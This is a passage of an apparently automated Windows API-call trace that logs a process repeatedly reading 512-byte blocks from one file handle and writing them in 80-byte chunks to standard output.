hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.641] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.641] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.642] GetFileType (hFile=0x50) returned 0x1 [0133.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.642] GetFileType (hFile=0x50) returned 0x1 [0133.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.642] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.643] GetFileType (hFile=0x50) returned 0x1 [0133.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.643] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.643] GetFileType (hFile=0x50) returned 0x1 [0133.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.643] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.643] GetFileType (hFile=0x50) returned 0x1 [0133.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.643] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] GetFileType (hFile=0x50) returned 0x1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] GetFileType (hFile=0x50) returned 0x1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] GetFileType (hFile=0x50) returned 0x1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.644] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.644] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.644] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.644] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] GetFileType (hFile=0x50) returned 0x1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] GetFileType (hFile=0x50) returned 0x1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] GetFileType (hFile=0x50) returned 0x1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] GetFileType (hFile=0x50) returned 0x1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] GetFileType (hFile=0x50) returned 0x1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] GetFileType (hFile=0x50) returned 0x1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] GetFileType (hFile=0x50) returned 0x1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] GetFileType (hFile=0x50) returned 0x1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.645] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.645] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] GetFileType (hFile=0x50) returned 0x1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] GetFileType (hFile=0x50) returned 0x1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.646] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.646] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.647] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.647] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.648] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.648] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.649] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.649] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.650] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.650] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, 